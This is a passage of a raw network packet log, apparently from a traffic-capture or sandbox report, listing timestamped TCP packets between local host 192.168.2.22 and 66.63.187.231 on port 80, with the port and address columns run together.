                                                Nov 20, 2024 10:11:25.474107981 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.474162102 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474174023 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474183083 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474195004 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474206924 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.474220991 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.474368095 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.474412918 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610430002 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610456944 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610470057 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610487938 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610519886 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610523939 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610537052 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610548973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610560894 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610569954 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610584021 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610596895 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.610872984 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610884905 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.610920906 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611083031 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611094952 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611105919 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611116886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611128092 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611139059 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611152887 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611166954 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611500978 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611512899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611524105 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611536026 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611546993 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611552000 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611560106 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611562967 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611572027 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611584902 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.611596107 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611596107 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611605883 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.611619949 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612271070 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612282991 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612293005 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612303972 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612314939 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612322092 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612327099 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612334967 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612339973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612346888 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612351894 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.612361908 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612375021 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.612390995 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613195896 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613207102 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613217115 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613231897 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613240957 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613245010 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613254070 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613256931 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613267899 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613267899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613279104 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613281012 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613291025 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613293886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613302946 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613306046 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.613317013 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.613332987 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614017963 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614028931 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614038944 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614052057 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614063025 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614064932 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614075899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614075899 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614087105 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614099979 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614105940 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614120007 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614130974 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614913940 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614926100 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614933968 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614944935 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614957094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614958048 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614969969 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614969969 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614983082 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.614984989 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.614995003 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.615001917 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615006924 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.615016937 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615020037 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.615029097 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615041971 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615056038 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615144968 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615683079 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.615731001 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.615741014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.615777969 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.616426945 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616463900 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616475105 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616509914 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.616674900 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616687059 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616697073 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616708040 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616718054 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.616733074 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.616986990 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.616998911 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617031097 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617193937 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617206097 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617216110 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617228031 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617238998 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617249012 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617255926 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617259979 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617266893 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617271900 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617283106 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617285013 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617294073 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617297888 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617309093 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617309093 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617319107 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617321968 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.617338896 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617348909 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.617438078 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618156910 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618169069 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618180037 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618191004 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618201017 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618206024 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618212938 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618213892 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618226051 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618230104 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618240118 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618242979 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618252039 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618258953 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618263960 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618271112 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618277073 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618284941 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618298054 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618310928 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.618923903 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618935108 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.618972063 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619036913 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619049072 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619060040 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619071007 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619081974 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619083881 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619092941 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619096041 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619105101 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619112968 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619117022 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619122028 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619129896 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.619141102 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619149923 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.619163036 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620168924 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620182037 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620193958 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620206118 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620217085 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620217085 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620229006 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620230913 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620244026 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620250940 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620256901 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620266914 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620270014 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620279074 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620289087 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620290995 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620301962 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620321989 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620759964 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620770931 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620780945 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620791912 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.620805979 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.620817900 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.703676939 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703690052 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703701973 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703752041 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.703773022 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.703958988 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703970909 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703982115 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.703994036 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.704111099 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.704111099 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.704111099 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.704291105 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.704302073 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.704312086 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.704323053 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.704339981 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.704349041 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.704363108 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.753705025 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753716946 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753727913 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753762960 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.753786087 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.753875017 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753886938 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753896952 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.753918886 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.753927946 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754268885 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754281044 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754292011 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754302979 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754314899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754317999 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754328012 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754334927 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754348040 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754359961 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754756927 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754770041 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754780054 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754791021 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754802942 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754812002 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754815102 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.754827023 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.754849911 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755228043 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755239964 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755249977 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755263090 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755271912 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755275011 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755285978 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755287886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755301952 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755810976 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755822897 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755832911 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755837917 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755846977 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755858898 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755860090 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755871058 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755875111 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755884886 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755889893 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755897045 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755903006 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755911112 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755919933 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755923033 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.755930901 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.755944967 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756747007 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756758928 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756769896 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756781101 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756792068 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756793022 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756804943 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756805897 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756817102 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756819963 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756829023 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756835938 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756840944 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756850958 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756851912 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.756870985 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.756889105 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757688999 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757702112 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757713079 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757724047 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757735014 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757738113 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757747889 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757749081 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757759094 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757766008 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757771015 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757780075 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757782936 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757791042 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757796049 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757805109 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757807970 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.757818937 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.757832050 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758624077 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758635044 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758646011 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758661985 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758673906 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758677006 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758686066 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758692026 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758698940 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758704901 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758711100 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758718967 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758723021 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758732080 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758735895 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.758744001 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.758759975 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759004116 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759572983 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759584904 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759594917 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759609938 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759620905 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759625912 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759633064 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759649038 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759651899 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759659052 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759664059 CET804917066.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:25.759670973 CET4917080192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:25.759679079 CET804917066.63.187.231192.168.2.22
